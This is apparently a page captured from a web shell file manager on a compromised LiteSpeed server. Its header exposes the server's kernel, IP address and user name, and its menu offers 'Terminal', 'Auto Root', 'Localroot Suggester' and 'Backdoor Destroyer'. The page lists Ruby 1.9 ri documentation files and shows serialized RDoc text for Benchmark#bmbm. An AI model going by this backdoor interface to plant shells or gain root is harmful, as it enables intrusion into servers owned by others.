Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Benchmark /
Delete
Unzip
Name
Size
Permission
Date
Action
Tms
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
benchmark-c.ri
1.95
KB
-rw-r--r--
2023-07-26 17:26
benchmark-i.ri
1.95
KB
-rw-r--r--
2023-07-26 17:26
bm-c.ri
983
B
-rw-r--r--
2023-07-26 17:26
bm-i.ri
983
B
-rw-r--r--
2023-07-26 17:26
bmbm-c.ri
1.76
KB
-rw-r--r--
2023-07-26 17:26
bmbm-i.ri
1.76
KB
-rw-r--r--
2023-07-26 17:26
cdesc-Benchmark.ri
4.51
KB
-rw-r--r--
2023-07-26 17:26
measure-c.ri
289
B
-rw-r--r--
2023-07-26 17:26
measure-i.ri
289
B
-rw-r--r--
2023-07-26 17:26
realtime-c.ri
261
B
-rw-r--r--
2023-07-26 17:26
realtime-i.ri
261
B
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" bmbm:EFI"Benchmark#bmbm;FF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"ASometimes benchmark results are skewed because code executed;TI"Cearlier encounters different garbage collection overheads than;TI"Fthat run later. #bmbm attempts to minimize this effect by running;TI"Gthe tests twice, the first time as a rehearsal in order to get the;TI"4runtime environment stable, the second time for;TI"Dreal. <tt>GC.start</tt> is executed before the start of each of;TI">the real timings; the cost of this is not included in the;TI"Etimings. In reality, though, there's only so much that #bmbm can;TI"Gdo, and the results are not guaranteed to be isolated from garbage;TI""collection and other effects.;To:RDoc::Markup::BlankLine o; ; [I"=Because #bmbm takes two passes through the tests, it can;TI"(calculate the required label width.;T@o:RDoc::Markup::Verbatim; [ I"require 'benchmark' ;FI" ;FI"'array = (1..1000000).map { rand } ;FI" ;FI"Benchmark.bmbm do |x| ;FI"- x.report("sort!") { array.dup.sort! } ;FI"- x.report("sort") { array.dup.sort } ;FI" end ;Fo; ; [I"<i>Generates:</i>;T@o;; [ I"9Rehearsal ----------------------------------------- ;FI"9sort! 11.928000 0.010000 11.938000 ( 12.756000) ;FI"9sort 13.048000 0.020000 13.068000 ( 13.857000) ;FI"9------------------------------- total: 25.006000sec ;FI" ;FI"8 user system total real ;FI"9sort! 12.959000 0.010000 12.969000 ( 13.793000) ;FI"9sort 12.007000 0.000000 12.007000 ( 12.791000) ;Fo; ; [I"A#bmbm yields a Benchmark::Job object and returns an array of;TI"Benchmark::Tms objects.;T: @file00I"job;F[ I"(width = 0);TI"lib/benchmark.rb;T